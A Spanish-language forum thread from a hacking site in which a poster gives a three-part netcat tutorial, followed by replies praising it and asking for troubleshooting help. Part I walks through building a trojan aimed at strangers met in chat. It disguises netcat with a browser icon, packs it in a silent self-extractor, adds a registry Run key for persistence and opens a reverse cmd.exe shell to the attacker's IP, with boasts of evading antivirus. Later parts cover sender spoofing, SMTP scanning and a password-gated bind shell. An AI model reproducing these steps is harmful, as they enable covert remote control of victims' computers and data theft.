elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Jugando con netcat
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 377,594 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Jugando con netcat
« en: 25 Marzo 2007, 03:17 am »


JUGANDO CON NETCAT V1.1
                Parte I


Como ya les habrán enseñado a utilizar el netcat, ahora yo les quiero enseñar como sacarle el jugo a este programilla muy útil… lo convertiremos desde un troyano hasta un cliente SMTP entre otras cosas.


TROYANIZANDO NETCAT

Como ya saben, con netcat puedes tomar una shell directamente o realizar una conexión inversa indicando mi IP o dirección DNS (para los que no saben lo que es un DNS… es un tipo de traducción que hace mas fácil poder encontrar tu PC, por ejemplo la IP 200.32.22.25 sería el DNS = pagina.cl ).

Bueno… primero hay que saber lo que vamos a hacer… la idea principal será tomar una shell de la PC de cualquier persona de un IRC (Chat).

Materiales:
ResHacker
Netcat v1.1
Winrar (Modo grafico)
Un icono de Internet Explorer.

Bueno, si no saben donde encontrar el icono tratare de dárselos con este documento XD si no se puede pueden usar cualquier otro icono (puedes hacerlo sin iconos también pero se verá sospechoso.)

Lo primero es conectarse a un Chat XD y conseguirse a alguna victima (ojala no lo hagan con sus novias porque si los pillan los van a patear XD ) … una ves que digan.. “esa es mi victimaaaaa!!!”  entonces usaremos algo que se llama ingeniería social y es a través del ingenio propio hacerse pasar por alguien o hacerse de la amistad de esa persona para poder obtener lo que queremos, la idea es que hablaremos con el y bla bla bla de donde eres bla bla bla… cuando termines le dices que otro día seguimos conversando… si todo va bien ps ya mañana tendrás la confianza suficiente como para darle un programa que le ayudará en el mantenimiento de su PC o que simplemente se divierta con un juego XD.

Dejamos de lado el Chat y en la noche nos ponemos a hacer el troyano de la siguiente forma:

Paso 1: Primero le cambiamos el icono para que sea menos sospechoso con el ResHacker:



En primer lugar abres el ResHacker y le das en "File/Open" y buscas el netcat. Después pinchas en acción y luego en "Add a new Resource", luego se verá la ventana que ves a la derecha y presionas donde dice “Open file with new resource” (paso 3) para buscar el icono que teniamos, luego donde dice “Resource Name” Debes escribir la palabra “ICON” tal como se ve en la foto y para finalizar presionamos en “Add Resource” y en “File/Save”. Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5)  veras que el netcat tiene el mismo icono de Internet Explorer XD



Paso 2: renombramos nc.exe y desde ahora se llamará “iexplorer.exe” XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)



Luego aparecerá el Winrar y empezaremos a crear nuestro troyano:

1.



Donde dice “Nombre del archivo” le escribimos “carnada.exe” (por ahora), el formato debe ser en “RAR” el método de compresión el mejor y por último y mas importante “Crear un archivo SFX”, el resto debe quedas deseleccionado.


2.



En la pestaña “Avanzado” (arriba) debes pinchar el botón llamado “Opciones SFX” y comenzaremos a configurar nuestro Winrar SFX.


3.



Ahora en “Carpeta de extracción” le diremos que descomprima el netcat (con nombre de iexplorer) en el directorio = %homedrive%%homepath%\update , ahora me diran: “Que es esto?!!”… %homedrive% significa que se descomprimirá dentro de la misma unidad de disco que esté Windows, o sea comúnmente (no siempre) “C:\” … %homepath% significa “Documents and settings\tu usuario actual” en conclusión se descomprimirá dentro del directorio raiz del usuario donde es casi el único lugar donde un usuario sin derechos de administrador puede sobrescribir, en otras palabras si le hubiese escrito %windir%\system32 pudiera haber tenido fallas al descomprimirse ya que no todos tienen derecho a ese directorio. Elegí una carpeta llamada update para llamar menos la atención.
En “Ejecutar tras la extracción” le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va nuestra ip] 80 , yo le puse la dirección 127.0.0.1 para pruebas pero ustedes le ponen la ip real que sale a Internet. 80 es el puerto donde el troyano se conectará con nosotros.

En “Ejecutar antes de la extracción” le escribimos lo siguiente = %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul … y ustedes me diran que es eso!!!!... le decimos que ejecute la consola de comandos CMD y llame a un ejecutable llamado “REG.EXE” el cual se encargará de agregar nuestra entrada al registro del sistema para que el troyano arranque solito cada ves que encienda la pc (recordar que donde dice 127.0.0.1 deben poner la ip de ustedes o en algunos casos (para los que saben) su DNS… es mas efectivo. (Consultar por el no-ip) y donde dice >nul significa que la victima no verá mas que un simple pestañazo del DOS en ves de mostrar todo lo que se está ejecutando.


4.



Acá estamos pidiendo a winrar que no muestre nada mientras se instala todo esto, asi será mas silencioso, rápido y automatizado.


5.



Por último cargamos un icono atractivo para que se vea con el troyano ya compilado y aceptamos todas las ventanas.


Debería quedar algo así:



Yo le puse icono de yahoo porque lo voy a probar desde el mismo Chat.


Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente”
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:



Y listo :D ahora solo falta visitar a nuestro amigo del día anterior y decirle que tienes un juego muy chido o que tienes algo para no se… usa tu imaginación. En mi caso y entré a una sala de yahoo y como hoy en día esta muy de moda los booters XD puse en sala que bajaran un antibooter para que no los pudieran sacar de la sala y les pase un link con la dirección donde estaba alojado el troyano. En resumidas cuentas… si alguien cae en tus maldades te debe aparecer esto:



Habrás tomado la shell de otra PC (manejar una shell de otra pc significa poder controlar el DOS de Windows o la shell de GNU.. es poder controlar la consola de comandos de la otra persona y a través de eso puedes subirle archivos, borrarle cosas, darle troyanos que te permitan ver su escritorio… mirar sus contraseñas volcando el registro en textos y asíéndoles un “type”… para los que saben un poquitito mas.. talvez saltar a otras pc con netbios, exploits como el dcom, acceder a servidores y dominar una red completa y ufff.. a volar la imaginación. Si no me creen miren estas tres capturas jugando con netcat XD nada serio:


1. El sueño de todo lamer XD :




2. Subiendo RealVnc4 para poder hacer una conexión iversa y mirar el escritorio de la otra persona:




3. Esto fue un ajuste de cuentas XD:




Les mostré como crear un troyano con netcat (indetectable por todos los antivirus por ahora) también puede hacerse con una conexión directa en ves de una inversa como la hice acá, así como ya saben hacerlo ;)

Esto es todo y espero poder mostrarles la próxima ves.. como convertir el Netcat v1.1 en un cliente SMTP para enviar correos automatizados y temporizados además de servir como cliente FTP con comandos automatizados sin la necesidad de la intervención de escribir los comandos desde la consola, también como ponerle contraseña a una sesión de shell con netcat entre muchas otras cosas mas ;)

Descargar en PDF
Descargar video explicativo

Preguntas mas frecuentes:
¿Porque me aparece que el archivo no existe?
R: http://foro.elhacker.net/index.php/topic,159799.msg860791.html#msg860791

¿Porque me dice error win32?
R: Estas intentando cambiar el icono al netcat V1.1, intenta con el 1.0

¿Porque me dice ""nc" no es un comando reconocido"?
R: http://foro.elhacker.net/index.php/topic,159799.msg758631.html#msg758631

¿Porque me aparece "h_errno 11001: HOST_NOT_FOUND" ?
R: http://foro.elhacker.net/index.php/topic,159799.msg754376.html#msg754376

Salu2 Att. Yan.
Unilola Software.



Enlaces actualizados
Actualmente casi todos los enlaces de descargas e imágenes no están pero los acabo de subir todos a este link incluyendo todos los videos:
http://tinyurl.com/3duv6qh
« Última modificación: 10 Diciembre 2011, 14:33 pm por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #1 en: 25 Marzo 2007, 05:32 am »

JUGANDO CON NETCAT V1.1
                Parte II



TRANSFORMANDO NETCAT EN UN CLIENTE SMTP Y FTP

Bueno… ahora les mostraré que no es necesario usar el bombermail, el feeboti, xmass o cualquier pendejada para enviar un correo sin tener que usar telnet. Claro está que hay programas que tienen muchas funciones como libreta de direcciones, escaneadotes de servidores SMTP, comprobación de usuarios y otras cosas que nos hacen todo ya automatizado en una linda ventanita grafica pequeña o tremendas presentaciones flash como el bomber de dragon XD, pero todo lo que pueden hacer estos programas… también puede hacerlo tu Netcat v1.1.

Materiales:
Netcat v1.1
Un editor de texto (el block de notas es ideal)


Si se han fijado… enviar un mail desde una consola NT no es muy fácil porque no viene por defecto algun programa que lo haga como el comando mail de GNU, pero si obtenemos una shell remota sobre una pc con netcat… puedes usar el mismo para enviar correos, archivos y lo que se te de la gana.

Creamos un texto con el block de notas que contenga lo siguiente:

helo queteimporta@yahoo.com
mail from: yan@anonimo.com
rcpt to: yan_uniko_102@yahoo.com.mx
data
From: yan@anonimo.com
To: yan_uniko_102@yahoo.com.mx
Subject: Provando netcat

Este es mi primer mensaje enviado con netcat
.


Bueno y que es esto en resumidas palabras?:
Helo      = nos identificamos
mail from   = correo proveniente
rcpt to      = correo destino
data      = el mensaje en si.

Dentro del mensaje decimos que el correo proviene desde  yan@anonimo.com para yan_uniko_102@yahoo.com.mx con el sujeto: probando netcat y con el mensaje: “Este es mi primer mensaje enviado con netcat”. Ahora fíjense de dos detalles muy importantes. Uno es el espacio en blanco entre la cabecera del mensaje y el mensaje en si (entre “subset” y “este es mi…”) y segundo el punto al final del mensaje.
Lo guardamos como queramos, yo elegí guardarlo como “mensaje.txt” y ejecuté lo siguiente:  type mensaje.txt|nc -vv -w 3 127.0.0.1 25 y me apareció algo como esto:



Puedes ver que todos los comandos que escribimos en el notepad se volcaron al netcat y se realizó la conexión y el envío automatizado. Ahora analicemos el comando un poco.

type mensaje.txt|nc -vv -w 3 127.0.0.1 25

type mensaje.txt   = decimos que se vuelque el contenido de mensaje.txt en pantalla
|         = decimos que al mismo tiempo ejecute el siguiente comando
nc -vv -w 3 127.0.0.1 25 = decimos que netcat se conecte al host 127.0.0.1 (servidor SMTP) hacia el puerto 25… -w 3 significa que espere tres segundos antes de enviar el correo para darle tiempo al servidor de reaccionar… -vv (Very Verbose) significa que te muestre lo que se está haciendo.

Podemos utilizar comandos como –attach para enviar archivos adjuntos o crear nuestras propias planillas en texto y con un simple bat… enviarlos a distintos destinatarios… podemos jugar mucho con este codigo hasta hacer un enorme bat que recoja el mismo mensaje para diferentes destinatarios dentro de un texto guardado llamado user a través del comando “for”. (el spam es delito XD ). Una buena ventaja de todo esto es que puedes hacer el texto con el comando echo de la siguiente manera:

Echo helo queteimporta@yahoo.com > mensaje.txt
Echo mail from: yan@anonimo.com >> mensaje.txt
Echo rcpt to: yan_uniko_102@yahoo.com.mx >> mensaje.txt
Echo data  >> mensaje.txt
Echo From: yan@anonimo.com >> mensaje.txt
Echo To: yan_uniko_102@yahoo.com.mx >> mensaje.txt
Echo Subject: Provando netcat >> mensaje.txt
Echo. >> mensaje.txt
Echo Este es mi primer mensaje enviado con netcat >> mensaje.txt
Echo . >> mensaje.txt


O puedes usar el comando for de la siguiente manera:

for /f %%i in (direcciones.txt) do Echo rcpt to: %%i >> mensaje.txt

y ufff  puedes hacer mil cosas como hasta escanear servidores SMTP con netcat hacienda un:

for /l %%i in (1,1,254) do if errorlevel = 0 nc 1 192.168.1.%%i 25|find "smtp" && echo 192.168.1.%%i >>escaner.txt

y los que estén dentro del rango de IPs seleccionadas y que respondan al puerto 25 con un barrer SMTP se escribirá su IP dentro de un texto llamado scanner.txt… también puedes usar el comando for para volcar textos con un listado amplio de IPs creados talvez por el dictmake.exe o el brainscan.exe o con otro bat XD.

Yo puse 127.0.0.1 de servidor en el primer ejemplo porque yo mismo utilicé un minirelay para poder enviar el correo ya que me dio flojera buscar un servidor para probar :p



Y al revisar el correo me encontré con mi netcat :D



Ahora esto también sirve para automatizar subidas y descargas de archivos a un ftp con tu netcat y decir por ejemplo que cada una hora me respalde mis archivos en mi ftp pero que primero borre los antiguos, en resumidas palabras seria algo así:

type comando.txt|nc -vv -w 3 127.0.0.1 21

y el commando.txt diría algo así:

user usuario
pass password
dele respaldo.rar
etc etc etc y al final quit


y veras como el netcat entra a tu ftp, borra el respaldo y coloca el nuevo. Para poder temporizar esto puedes usar un comando muy facil que me enseñó un muy buen amigo mío (Octhal):

ping 127.0.0.1 -n 2  >nul

Esto equivale a un segundo… o sea para que esto se transforme en una hora quedaría así:

ping 127.0.0.1 -n 7200  >nul

Con todo esto tu bat debería quedar así:

@Echo off
Cls
:1
Echo Ultima actualizacion: %time% %date%
type comando.txt|nc -vv -w 3 127.0.0.1 21
ping 127.0.0.1 -n 7200  >nul
goto 1


Decimos que respalde nuestros archivos y que después de una hora se haga un goto para hacer un loop. También puedes usar esto para subir archivos desde una PC tomada con tu shell y ponerles, obviamente tu como servidor.

Como puedes ver… acá mostré como hacer interactuar el netcat con un servidor y transformarlo en un anonimail XD o ftp client… también puedes hacer un consultador SQL, un bot IRC, un cliente tftp… etc etc etc… es solo cosa de imaginación ;)
La próxima vez les enseñaré como ponerle contraseña a netcat para que nadie usurpe tus shells con o sin conocimientos de programación.
Hasta la prox.

Descargar en PDF
Ver video explicativo

Att. Yan
Unilola Software
« Última modificación: 10 Diciembre 2011, 14:34 pm por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #2 en: 25 Marzo 2007, 06:32 am »

JUGANDO CON NETCAT V1.1
              Parte III



PONIENDO UNA CONTRASEÑA A TUS SHELLS

Ahora les demostraré que no es necesario saber programar en C para crear un dispositivo que nos permita entrar en una shell a través de una contraseña.

Lo primero es abrir el block de notas y escribimos lo siguiente:

@echo off
if not exist ips.txt (goto 1) else goto 2

:1
Echo ips.txt no existe :(
Echo.
pause
exit

:2
for /f %%i in (ips.txt) do netstat -n|find "%%i" && CMD
Echo Te has desconectado del servidor remoto.
Exit


Ahora me diras.. que es esto?!.. tranquilo, después lo explico XD. Ahora crea otro texto llamado “Iniciar servidor.bat” con el siguiente contenido:

start nc -L -d -e index.bat -p 5051

También lo explicaré después… ahora crea otro texto llamado “Detener servidor.bat” con el siguiente contenido:

tskill nc

Luego crea un texto llamado ips.txt y dentro del texto le escribes tu ip y las ip que tu quieres que tengan acceso a esa shell, y por último pon el netcat junto con todo esto en una carpeta guardada por ahí talves en system32 o donde tu quieras pero todo debe estar en el mismo lugar a menos que quieras modificar el codigo fuente del bat.
Es hora de dar las explicaciones:

Al abrir el bat llamado “iniciar servidor.bat” ejecutaras el netcat y lo dejaras a escucha de otro bat llamado “index.bat” en el puerto 5051 (a elección), luego si alguien se conecta a tu shell se iniciará netcat y comenzará a leer los comandos del bat y resolverá lo siguiente:

if not exist ips.txt (goto 1) else goto 2
:1
Echo pass.txt no existe :(
Echo.
pause
exit


Esto significa que si no existe el archivo con las IP, entonces solo se cierra botándote de la shell, si existe entonces procede a hacer el chequeo:

for /f %%i in (ips.txt) do netstat -n|find "%%i" && CMD
Echo Te has desconectado del servidor remoto.
Exit


Nos fijaremos principalmente en la primera línea de esta frase y analizaremos que %%i se transforma en las ip puestas en el texto llamado “ips.txt” y ejecuta: netstat -n|find "%%i" && CMD lo cual significa que hace un netstat –n mostrando todas las ip conectadas a ti (incluyendo el que está pidiendo la shell) y al mismo tiempo el comando find busca entre todas esas IPs que estan conectadas si coincide alguna con la ip señalada en el texto y si esta aparece ejecuta CMD y si no aparece te bota de la shell :P (Por eso es recomendable no poner mas que solo tu ip dentro de ese texto porque si hay un usuario logueado entonces todos los demas tendran acceso libre sin autentificación. Y ojala no sea 127.0.0.1 ni tu ip externa porque puede prestarse para confusiones y no servirá de nada todo esto.)
El comando tskill nc significa que mata el proceso llamado nc (el comando tskill viene con todos los Sistemas Operativos NT desde Windows Xp con SP2 en adelante o puedes reemplazarlo por otros comandos que destruyan el proceso)

Como puedes ver no fue necesario saber programar en C para ponerle un acceso seguro a tu shell y que nadie mas te la quite. Esto puede ser muy útiles para administradores de pequeñas redes que quieren tener acceso a ciertos puntos de redes desde el servidor o para que nadie mas se meta en la PC de tu novia mas que tu XD.


PARA PROGRAMADORES

Para los programadores en C puedes probar con una sentencia if donde if pass=[loquequieras] un ejemplo:

#include <stdio.h>
#include <stdlib.h>
main()
{
int usuario,clave=84262;
printf("Introduce la contraseña: ");
scanf("%d",&usuario);
if(usuario==clave)
printf("Acceso concedido!.\n\n");
else
exit (1);
system("cmd.exe");
exit (0);
}


Esto se me ocurrió en mis ratos de ocio XD, cuando lo abres te pide una contraseña y si es la escrita en el codigo fuente, ps te da la shell y si no te da una salida limpia.

Listo amigos… hasta aca llego por ahora.. ya es tarde y otro dia continuo… a grandes rasgos quise demostrar que no se necesita ser programador en C o ingeniero en programación para poder ponerle una pequeña contraseña automatica por asi decirlo :p tambien puedes reemplazar las ip por dominios DNS y reemplazar el comando netstat –n por netstat solamente. Tambien puedes hacer cosas mucho mas eficientes y complejas pero la idea es que por ahora todos sin importar sus conocimientos puedan hacer esto.

Descargar en formato PDF
Ver video explicativo

Att. Yan
Unilola Software.
« Última modificación: 12 Mayo 2009, 12:32 pm por WHK » En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #3 en: 25 Marzo 2007, 13:21 pm »

He movido mi mensaje, te quedó muy bonito el manual. A seguir así!!

Saludos
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Zedmix


Desconectado Desconectado

Mensajes: 672


B*A


Ver Perfil
Re: Jugando con netcat
« Respuesta #4 en: 25 Marzo 2007, 13:47 pm »

Felicidades, muy completito.

Saludos
En línea

Conciencia, Compromiso, Rebeldia y Solidaridad


zhyzura
Colaborador
***
Desconectado Desconectado

Mensajes: 2.503



Ver Perfil
Re: Jugando con netcat
« Respuesta #5 en: 25 Marzo 2007, 22:47 pm »

enhorabuena por tu manual!!!

me hizo recordar muchas cosas cuando lo lei :P

lo he agregado al recopilatorio de post.

saludos
En línea

Ilorev


Desconectado Desconectado

Mensajes: 475


???


Ver Perfil
Re: Jugando con netcat
« Respuesta #6 en: 26 Marzo 2007, 00:31 am »

hola!!
ta jevi!!!!
saludos
En línea

EOF
.NiXoN.


Desconectado Desconectado

Mensajes: 946


Ubuntu user :D


Ver Perfil
Re: Jugando con netcat
« Respuesta #7 en: 26 Marzo 2007, 14:44 pm »

Wenas !!

Muy bueno el Manual, sí señor !! Eso sí que es sacar jugo...jajaja

Saludos !!
En línea

El que todo lo sabe sabe que no todo lo sabe


fitu

Desconectado Desconectado

Mensajes: 208


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #8 en: 27 Marzo 2007, 02:42 am »

Hola a todo... posteo pq me surgio un problema, cree el sfx y siguiendo tal cual los pasos, hasta me consegui un icono del msn...
luego abro una ventana y escribo "nc -vv -L -p 80" y despues pruebo hacele click a mi sfx... pasa lo siguiente...
*se me descomprimen los archivos en \update
*se me crea el registro tal cual lo necesito
pero ! no me hace la shell y en cambio me dice: iexplorer.exe no es una aplicacion Win32 valida.
depues de eso acepto... pq no me queda otra y nada... nunca se me hizo la shell...
corrobore los ips y estan bien... no se q puede estar pasando... alguna sugerencia?
gracias :D
y Muy bueno el manual :p aunque no me funciones xD
En línea

ChizzoColman

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Jugando con netcat
« Respuesta #9 en: 27 Marzo 2007, 04:01 am »

Hola que tal..
En la parte I del manual..Una vez que hago "carnada.exe" y para probarlo lo ejecuto pero me sale un cartel de error que dice "Window no puede encontrar el archivo 'iexplorer.exe'.Asegurese que la ruta y el nombre del archivo estan escritos correctamente y vuelva a intentarlo. Para buscar un archivo, haga click en el boton Inicio y luego en Buscar."
En línea

Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines